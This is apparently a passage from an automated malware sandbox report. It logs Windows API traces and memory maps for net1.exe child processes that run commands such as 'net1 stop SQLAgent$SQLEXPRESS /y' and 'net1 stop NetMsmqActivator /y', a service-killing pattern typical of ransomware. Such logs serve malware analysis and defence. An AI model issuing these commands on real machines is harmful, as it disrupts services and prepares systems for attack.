(lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x37cdf0 [0123.976] GetServiceKeyNameW (in: hSCManager=0x37cdf0, lpDisplayName="EHTTPSRV", lpServiceName=0xff285750, lpcchBuffer=0x1af748 | out: lpServiceName="", lpcchBuffer=0x1af748) returned 0 [0123.978] _wcsicmp (_String1="msg", _String2="EHTTPSRV") returned 8 [0123.978] _wcsicmp (_String1="messenger", _String2="EHTTPSRV") returned 8 [0123.978] _wcsicmp (_String1="receiver", _String2="EHTTPSRV") returned 13 [0123.978] _wcsicmp (_String1="rcv", _String2="EHTTPSRV") returned 13 [0123.978] _wcsicmp (_String1="redirector", _String2="EHTTPSRV") returned 13 [0123.978] _wcsicmp (_String1="redir", _String2="EHTTPSRV") returned 13 [0123.978] _wcsicmp (_String1="rdr", _String2="EHTTPSRV") returned 13 [0123.978] _wcsicmp (_String1="workstation", _String2="EHTTPSRV") returned 18 [0123.978] _wcsicmp (_String1="work", _String2="EHTTPSRV") returned 18 [0123.978] _wcsicmp (_String1="wksta", _String2="EHTTPSRV") returned 18 [0123.978] _wcsicmp (_String1="prdr", _String2="EHTTPSRV") returned 11 [0123.978] _wcsicmp (_String1="devrdr", _String2="EHTTPSRV") returned -1 [0123.978] _wcsicmp (_String1="lanmanworkstation", _String2="EHTTPSRV") returned 7 [0123.978] _wcsicmp (_String1="server", _String2="EHTTPSRV") returned 14 [0123.978] _wcsicmp (_String1="svr", _String2="EHTTPSRV") returned 14 [0123.978] _wcsicmp (_String1="srv", _String2="EHTTPSRV") returned 14 [0123.978] _wcsicmp (_String1="lanmanserver", _String2="EHTTPSRV") returned 7 [0123.978] _wcsicmp (_String1="alerter", _String2="EHTTPSRV") returned -4 [0123.978] _wcsicmp (_String1="netlogon", _String2="EHTTPSRV") returned 9 [0123.978] NetServiceControl (in: servername=0x0, service="EHTTPSRV", opcode=0x0, arg=0x0, bufptr=0x1af750 | out: bufptr=0x1af750) returned 0x889 [0123.979] wcscpy_s (in: _Destination=0xff2880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0123.979] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0123.980] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0123.981] GetFileType (hFile=0xb) returned 0x2 [0123.999] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af618 | out: lpMode=0x1af618) returned 1 [0124.000] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af610, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0x1af610*=0x1e) returned 1 [0124.000] GetFileType (hFile=0xb) returned 0x2 [0124.000] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af618 | out: lpMode=0x1af618) returned 1 [0124.000] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af610, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0x1af610*=0x2) returned 1 [0124.001] _ultow (in: _Dest=0x889, _Radix=1767040 | out: _Dest=0x889) returned="2185" [0124.001] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0124.001] GetFileType (hFile=0xb) returned 0x2 [0124.001] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af618 | out: lpMode=0x1af618) returned 1 [0124.001] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af610, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0x1af610*=0x34) returned 1 [0124.002] GetFileType (hFile=0xb) returned 0x2 [0124.002] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af618 | out: lpMode=0x1af618) returned 1 [0124.002] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af610, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0x1af610*=0x2) returned 1 [0124.002] NetApiBufferFree (Buffer=0x374d40) returned 0x0 [0124.002] NetApiBufferFree (Buffer=0x37c0e0) returned 0x0 [0124.002] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EhttpSrv /y" [0124.002] exit (_Code=2) Process: id = "406" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x73041000" os_pid = "0xf08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "383" os_parent_pid = "0xd38" cmd_line = "C:\\Windows\\system32\\net1 stop NetMsmqActivator /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14007 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14008 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14009 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14010 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 14011 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14012 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 14013 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14014 start_va = 0xff260000 end_va = 0xff292fff entry_point = 0xff260000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 14015 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14016 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14017 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 14018 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 14019 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14020 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 14021 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14022 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14023 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14024 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14025 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14038 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14039 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 14040 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 14041 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 14042 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 14043 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 14044 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 14045 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 14046 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 14047 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 14048 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 14049 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 14050 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 14051 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14052 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14053 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14054 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14055 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14056 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14064 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 967 os_tid = 0x4ec [0123.831] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fa10 | out: lpSystemTimeAsFileTime=0x22fa10*(dwLowDateTime=0xfeed9e70, dwHighDateTime=0x1d48689)) [0123.831] GetCurrentProcessId () returned 0xf08 [0123.831] GetCurrentThreadId () returned 0x4ec [0123.831] GetTickCount () returned 0x2894b [0123.831] QueryPerformanceCounter (in: lpPerformanceCount=0x22fa18 | out: lpPerformanceCount=0x22fa18*=1817074900000) returned 1 [0123.831] GetModuleHandleW (lpModuleName=0x0) returned 0xff260000 [0123.831] __set_app_type (_Type=0x1) [0123.831] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff279c9c) returned 0x0 [0123.832] __getmainargs (in: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788, _DoWildCard=0, _StartInfo=0xff28479c | out: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788) returned 0 [0123.832] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.832] GetConsoleOutputCP () returned 0x1b5 [0123.845] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff28cec0 | out: lpCPInfo=0xff28cec0) returned 1 [0123.845] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0123.847] sprintf_s (in: _DstBuf=0x22f9b8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0123.847] setlocale (category=0, locale=".437") returned="English_United States.437" [0123.848] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0123.848] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0123.848] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop NetMsmqActivator /y" [0123.848] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22f750, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0123.848] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0123.849] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x22f9a8 | out: Buffer=0x22f9a8*=0x64d50) returned 0x0 [0123.849] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x22f9a8 | out: Buffer=0x22f9a8*=0x6c100) returned 0x0 [0123.849] _fileno (_File=0x7fefdba2a80) returned 0 [0123.849] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0123.849] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0123.849] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0123.849] _wcsicmp (_String1="config", _String2="stop") returned -16 [0123.849] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0123.849] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0123.849] _wcsicmp (_String1="file", _String2="stop") returned -13 [0123.849] _wcsicmp (_String1="files", _String2="stop") returned -13 [0123.849] _wcsicmp (_String1="group", _String2="stop") returned -12 [0123.849] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0123.849] _wcsicmp (_String1="help", _String2="stop") returned -11 [0123.849] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0123.849] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0123.849] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0123.849] _wcsicmp (_String1="session", _String2="stop") returned -15 [0123.849] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0123.849] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0123.849] _wcsicmp (_String1="share", _String2="stop") returned -12 [0123.849] _wcsicmp (_String1="start", _String2="stop") returned -14 [0123.849] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0123.849] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0123.849] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0123.849] _wcsicmp (_String1="accounts", _String2="NetMsmqActivator") returned -13 [0123.849] _wcsicmp (_String1="computer", _String2="NetMsmqActivator") returned -11 [0123.849] _wcsicmp (_String1="config", _String2="NetMsmqActivator") returned -11 [0123.849] _wcsicmp (_String1="continue", _String2="NetMsmqActivator") returned -11 [0123.849] _wcsicmp (_String1="cont", _String2="NetMsmqActivator") returned -11 [0123.849] _wcsicmp (_String1="file", _String2="NetMsmqActivator") returned -8 [0123.850] _wcsicmp (_String1="files", _String2="NetMsmqActivator") returned -8 [0123.850] _wcsicmp (_String1="group", _String2="NetMsmqActivator") returned -7 [0123.850] _wcsicmp (_String1="groups", _String2="NetMsmqActivator") returned -7 [0123.850] _wcsicmp (_String1="help", _String2="NetMsmqActivator") returned -6 [0123.850] _wcsicmp (_String1="helpmsg", _String2="NetMsmqActivator") returned -6 [0123.850] _wcsicmp (_String1="localgroup", _String2="NetMsmqActivator") returned -2 [0123.850] _wcsicmp (_String1="pause", _String2="NetMsmqActivator") returned 2 [0123.850] _wcsicmp (_String1="session", _String2="NetMsmqActivator") returned 5 [0123.850] _wcsicmp (_String1="sessions", _String2="NetMsmqActivator") returned 5 [0123.850] _wcsicmp (_String1="sess", _String2="NetMsmqActivator") returned 5 [0123.850] _wcsicmp (_String1="share", _String2="NetMsmqActivator") returned 5 [0123.850] _wcsicmp (_String1="start", _String2="NetMsmqActivator") returned 5 [0123.850] _wcsicmp (_String1="stats", _String2="NetMsmqActivator") returned 5 [0123.850] _wcsicmp (_String1="statistics", _String2="NetMsmqActivator") returned 5 [0123.850] _wcsicmp (_String1="stop", _String2="NetMsmqActivator") returned 5 [0123.850] _wcsicmp (_String1="time", _String2="NetMsmqActivator") returned 6 [0123.850] _wcsicmp (_String1="user", _String2="NetMsmqActivator") returned 7 [0123.850] _wcsicmp (_String1="users", _String2="NetMsmqActivator") returned 7 [0123.850] _wcsicmp (_String1="msg", _String2="NetMsmqActivator") returned -1 [0123.850] _wcsicmp (_String1="messenger", _String2="NetMsmqActivator") returned -1 [0123.850] _wcsicmp (_String1="receiver", _String2="NetMsmqActivator") returned 4 [0123.850] _wcsicmp (_String1="rcv", _String2="NetMsmqActivator") returned 4 [0123.850] _wcsicmp (_String1="netpopup", _String2="NetMsmqActivator") returned 3 [0123.850] _wcsicmp (_String1="redirector", _String2="NetMsmqActivator") returned 4 [0123.850] _wcsicmp (_String1="redir", _String2="NetMsmqActivator") returned 4 [0123.850] _wcsicmp (_String1="rdr", _String2="NetMsmqActivator") returned 4 [0123.850] _wcsicmp (_String1="workstation", _String2="NetMsmqActivator") returned 9 [0123.850] _wcsicmp (_String1="work", _String2="NetMsmqActivator") returned 9 [0123.850] _wcsicmp (_String1="wksta", _String2="NetMsmqActivator") returned 9 [0123.850] _wcsicmp (_String1="prdr", _String2="NetMsmqActivator") returned 2 [0123.850] _wcsicmp (_String1="devrdr", _String2="NetMsmqActivator") returned -10 [0123.850] _wcsicmp (_String1="lanmanworkstation", _String2="NetMsmqActivator") returned -2 [0123.850] _wcsicmp (_String1="server", _String2="NetMsmqActivator") returned 5 [0123.850] _wcsicmp (_String1="svr", _String2="NetMsmqActivator") returned 5 [0123.850] _wcsicmp (_String1="srv", _String2="NetMsmqActivator") returned 5 [0123.850] _wcsicmp (_String1="lanmanserver", _String2="NetMsmqActivator") returned -2 [0123.850] _wcsicmp (_String1="alerter", _String2="NetMsmqActivator") returned -13 [0123.850] _wcsicmp (_String1="netlogon", _String2="NetMsmqActivator") returned -1 [0123.851] _wcsupr (in: _String="NetMsmqActivator" | out: _String="NETMSMQACTIVATOR") returned="NETMSMQACTIVATOR" [0123.851] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6ce10 [0123.854] GetServiceKeyNameW (in: hSCManager=0x6ce10, lpDisplayName="NETMSMQACTIVATOR", lpServiceName=0xff285750, lpcchBuffer=0x22f8c8 | out: lpServiceName="", lpcchBuffer=0x22f8c8) returned 0 [0123.856] _wcsicmp (_String1="msg", _String2="NETMSMQACTIVATOR") returned -1 [0123.856] _wcsicmp (_String1="messenger", _String2="NETMSMQACTIVATOR") returned -1 [0123.856] _wcsicmp (_String1="receiver", _String2="NETMSMQACTIVATOR") returned 4 [0123.856] _wcsicmp (_String1="rcv", _String2="NETMSMQACTIVATOR") returned 4 [0123.856] _wcsicmp (_String1="redirector", _String2="NETMSMQACTIVATOR") returned 4 [0123.856] _wcsicmp (_String1="redir", _String2="NETMSMQACTIVATOR") returned 4 [0123.856] _wcsicmp (_String1="rdr", _String2="NETMSMQACTIVATOR") returned 4 [0123.856] _wcsicmp (_String1="workstation", _String2="NETMSMQACTIVATOR") returned 9 [0123.856] _wcsicmp (_String1="work", _String2="NETMSMQACTIVATOR") returned 9 [0123.856] _wcsicmp (_String1="wksta", _String2="NETMSMQACTIVATOR") returned 9 [0123.856] _wcsicmp (_String1="prdr", _String2="NETMSMQACTIVATOR") returned 2 [0123.856] _wcsicmp (_String1="devrdr", _String2="NETMSMQACTIVATOR") returned -10 [0123.856] _wcsicmp (_String1="lanmanworkstation", _String2="NETMSMQACTIVATOR") returned -2 [0123.856] _wcsicmp (_String1="server", _String2="NETMSMQACTIVATOR") returned 5 [0123.856] _wcsicmp (_String1="svr", _String2="NETMSMQACTIVATOR") returned 5 [0123.856] _wcsicmp (_String1="srv", _String2="NETMSMQACTIVATOR") returned 5 [0123.856] _wcsicmp (_String1="lanmanserver", _String2="NETMSMQACTIVATOR") returned -2 [0123.856] _wcsicmp (_String1="alerter", _String2="NETMSMQACTIVATOR") returned -13 [0123.856] _wcsicmp (_String1="netlogon", _String2="NETMSMQACTIVATOR") returned -1 [0123.856] NetServiceControl (in: servername=0x0, service="NETMSMQACTIVATOR", opcode=0x0, arg=0x0, bufptr=0x22f8d0 | out: bufptr=0x22f8d0) returned 0x0 [0123.857] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x22f888 | out: Buffer=0x22f888*=0x70c90) returned 0x0 [0123.857] OpenServiceW (hSCManager=0x6ce10, lpServiceName="NETMSMQACTIVATOR", dwDesiredAccess=0xc) returned 0x6ce70 [0123.858] QueryServiceStatus (in: hService=0x6ce70, lpServiceStatus=0x22f830 | out: lpServiceStatus=0x22f830*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0123.858] GetServiceDisplayNameW (in: hSCManager=0x6ce10, lpServiceName="NETMSMQACTIVATOR", lpDisplayName=0xff285350, lpcchBuffer=0x22f808 | out: lpDisplayName="Net.Msmq Listener Adapter", lpcchBuffer=0x22f808) returned 1 [0123.858] NetApiBufferFree (Buffer=0x70c90) returned 0x0 [0123.858] CloseServiceHandle (hSCObject=0x6ce70) returned 1 [0123.859] wcscpy_s (in: _Destination=0xff2880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0123.859] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0123.859] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="The Net.Msmq Listener Adapter service is not started.\r\n") returned 0x37 [0123.861] GetFileType (hFile=0xb) returned 0x2 [0123.861] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22f728 | out: lpMode=0x22f728) returned 1 [0123.861] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x37, lpNumberOfCharsWritten=0x22f720, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0x22f720*=0x37) returned 1 [0123.861] GetFileType (hFile=0xb) returned 0x2 [0123.862] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22f728 | out: lpMode=0x22f728) returned 1 [0123.862] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f720, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0x22f720*=0x2) returned 1 [0123.862] _ultow (in: _Dest=0xdc1, _Radix=2291600 | out: _Dest=0xdc1) returned="3521" [0123.862] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0123.862] GetFileType (hFile=0xb) returned 0x2 [0123.862] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22f728 | out: lpMode=0x22f728) returned 1 [0123.863] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x22f720, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0x22f720*=0x34) returned 1 [0123.863] GetFileType (hFile=0xb) returned 0x2 [0123.863] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22f728 | out: lpMode=0x22f728) returned 1 [0123.863] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f720, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0x22f720*=0x2) returned 1 [0123.864] NetApiBufferFree (Buffer=0x64d50) returned 0x0 [0123.864] NetApiBufferFree (Buffer=0x6c100) returned 0x0 [0123.864] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop NetMsmqActivator /y" [0123.864] exit (_Code=2) Process: id = "407" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0xd267000" os_pid = "0x1030" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "398" os_parent_pid = "0xd28" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$SQLEXPRESS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14026 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14027 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14028 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14029 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 14030 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14031 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 14032 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14033 start_va = 0xff260000 end_va = 0xff292fff entry_point = 0xff260000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 14034 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 